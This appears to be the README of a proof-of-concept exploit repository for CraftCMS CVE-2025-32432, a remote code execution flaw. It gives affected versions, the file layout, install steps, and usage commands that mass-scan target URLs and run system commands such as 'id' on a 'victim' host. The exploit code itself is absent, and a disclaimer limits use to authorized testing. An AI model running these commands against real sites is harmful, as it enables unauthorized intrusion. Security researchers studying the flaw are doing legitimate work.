
CraftCMS CVE-2025-32432 - 클린 PoC
원본 Proof of Concept의 정리 및 개선 버전입니다.
이 프로젝트는 MIT 라이선스로 제공됩니다.
자세한 내용은 LICENSE 파일을 참조하세요.
이 PoC는 교육 목적 및 승인된 테스트 용도로만 제공됩니다 (CTF, 명시적 서면 허가를 받은 보안 감사).
허가 없이 시스템에 사용하는 것은 불법입니다. 저자는 오용으로 인한 어떠한 책임도 지지 않습니다.
< 3.9.15< 4.14.15< 5.6.17craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# Ou avec une liste
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → URL cible (obligatoire)
-c, --cmd → Commande système à exécuter (obligatoire)
-a, --asset → AssetId valide connu (optionnel)
-s, --scan-max → Max assetId à scanner (défaut: 300)